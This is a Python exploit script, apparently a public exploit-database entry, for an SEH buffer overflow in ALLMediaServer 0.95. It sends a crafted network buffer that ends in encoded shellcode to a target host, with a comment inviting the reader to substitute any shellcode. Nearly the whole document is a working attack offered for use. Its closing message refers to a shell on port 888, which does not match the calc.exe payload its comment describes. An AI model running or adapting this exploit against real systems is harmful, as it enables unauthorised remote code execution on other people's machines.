#!/usr/bin/python print """ [+] Exploit Title: ALLMediaServer 0.95 SEH Overflow Exploit [+] Date: 21/08/2013 [+] Exploit Author: metacom [+] Romanian Security Team [+] Software Link:http://allmediaserver.org/download [+] Version: ALLMediaServer 0.95 [+] Tested On: Windows XP SP3 English [+] ALLMediaServer run online mod and try two or three times to run exploit """ import time import socket import sys if len(sys.argv) != 3: print "Usage: ./exploit.py " sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) buffer = "http://" + "\x41" * 1065 nseh = "\xEB\x06\xFF\xFF" seh = "\x54\x08\x6f\x00" #0x0042173c # 0x006f0854 nops = "\x90" * 50 #msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00' -e x86/shikata_ga_nai -t c # you can replace the shellcode with any shellcode u want shell = ("\xb8\x66\xa5\xa3\x41\xdb\xd5\xd9\x74\x24\xf4\x5b\x33\xc9\xb1" "\x33\x31\x43\x12\x83\xc3\x04\x03\x25\xab\x41\xb4\x55\x5b\x0c" "\x37\xa5\x9c\x6f\xb1\x40\xad\xbd\xa5\x01\x9c\x71\xad\x47\x2d" "\xf9\xe3\x73\xa6\x8f\x2b\x74\x0f\x25\x0a\xbb\x90\x8b\x92\x17" "\x52\x8d\x6e\x65\x87\x6d\x4e\xa6\xda\x6c\x97\xda\x15\x3c\x40" "\x91\x84\xd1\xe5\xe7\x14\xd3\x29\x6c\x24\xab\x4c\xb2\xd1\x01" "\x4e\xe2\x4a\x1d\x18\x1a\xe0\x79\xb9\x1b\x25\x9a\x85\x52\x42" "\x69\x7d\x65\x82\xa3\x7e\x54\xea\x68\x41\x59\xe7\x71\x85\x5d" "\x18\x04\xfd\x9e\xa5\x1f\xc6\xdd\x71\x95\xdb\x45\xf1\x0d\x38" "\x74\xd6\xc8\xcb\x7a\x93\x9f\x94\x9e\x22\x73\xaf\x9a\xaf\x72" "\x60\x2b\xeb\x50\xa4\x70\xaf\xf9\xfd\xdc\x1e\x05\x1d\xb8\xff" "\xa3\x55\x2a\xeb\xd2\x37\x20\xea\x57\x42\x0d\xec\x67\x4d\x3d" "\x85\x56\xc6\xd2\xd2\x66\x0d\x97\x2d\x2d\x0c\xb1\xa5\xe8\xc4" "\x80\xab\x0a\x33\xc6\xd5\x88\xb6\xb6\x21\x90\xb2\xb3\x6e\x16" "\x2e\xc9\xff\xf3\x50\x7e\xff\xd1\x32\xe1\x93\xba\x9a\x84\x13" "\x58\xe3") payload = buffer + nseh + seh + nops + shell s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((target, port)) print "[+] Connected" except: print "[!] Connection Failed" sys.exit(0) print "[+] Sending payload..." s.send(payload) time.sleep(1) s.close() print "[+] Check port 888 for your shell"